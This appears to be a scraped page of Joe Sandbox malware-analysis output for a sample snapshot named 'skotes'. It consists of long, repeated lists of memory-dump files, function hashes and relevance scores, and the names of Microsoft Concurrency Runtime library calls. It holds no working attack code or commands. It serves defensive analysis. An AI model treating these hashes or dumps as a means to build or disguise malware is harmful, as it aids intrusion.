Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22a7264eb0513b267fae2a0cfb95be6487b6e34a04412e31cf59bee81131fe0a
Instruction ID: d2fbdb46248162eed865aa4377314195599056cfeca05d3ab4f182bca4f4899e
Opcode Fuzzy Hash: 22a7264eb0513b267fae2a0cfb95be6487b6e34a04412e31cf59bee81131fe0a
Instruction Fuzzy Hash: 1C51CFB2A266068BDB25CF59D8857AEB7F5FB48301F25856AC809EB750D334AD04CF90

Function 009726D1 Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 009726E3

Part of subcall function 009724E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00972504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00972704
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00972711
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0097275F
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 009727E6
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 009727F9
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00972846

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: 6e56be2a456c7018cbe7f40907a81e2bf2e40f5ba39f059e46d9aade711e620b
Instruction ID: f22b93f1d1fceeea10baa99652c165d063cd7e3487da330be8dad09378880d69
Opcode Fuzzy Hash: 6e56be2a456c7018cbe7f40907a81e2bf2e40f5ba39f059e46d9aade711e620b
Instruction Fuzzy Hash: F281E032910249ABDF16CF94CA51BFE7BB6AF85304F048098FD492B292C7329D15DB62

Function 00972970 Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00972982

Part of subcall function 009724E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00972504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 009729A3
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 009729B0
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 009729FE
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00972AA6
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00972AD8

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: a5d195ee7ee52171869d2cd49c19e4f3b3fe1e33e5e837a7205a68c1693c2b92
Instruction ID: a526b1fbbddee89231dca433725da4603d38030260a418f27e93b94e83ff81cb
Opcode Fuzzy Hash: a5d195ee7ee52171869d2cd49c19e4f3b3fe1e33e5e837a7205a68c1693c2b92
Instruction Fuzzy Hash: 7971C032910249AFDF15CF64C981BBEBBB9AF96304F048099FC496B292C732DD15DB61

Function 00962832 Relevance: 15.2, APIs: 10, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00962876
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 009628DF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00962913

Part of subcall function 009607ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 0096080D

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00962993
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 009629DB

Part of subcall function 009607C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 009607DE

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 009629EF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00962A00
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00962A4D
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00962A7E

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
String ID:
API String ID: 1321587334-0
Opcode ID: d55b0fdddd78d0a8c2f83b2ca7034cdbeb56eeefbf96db18285db034308de472
Instruction ID: 7f4bae04f6be37f7651dd163eb0ee97012861c6c8313f7d703a6eb3c572d72ab
Opcode Fuzzy Hash: d55b0fdddd78d0a8c2f83b2ca7034cdbeb56eeefbf96db18285db034308de472
Instruction Fuzzy Hash: C1810031B14A169FCB18CFA8D9906BEBBF5BF89311B25402DD445E7381D734AD80DBA0

Function 009669DA Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00966A1F
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00966A51
List.LIBCONCRT ref: 00966A8C
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00966A9D
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00966AB9
List.LIBCONCRT ref: 00966AF4
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00966B05
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00966B20
List.LIBCONCRT ref: 00966B5B
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00966B68

Part of subcall function 00965EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00965EF7
Part of subcall function 00965EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00965F09

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
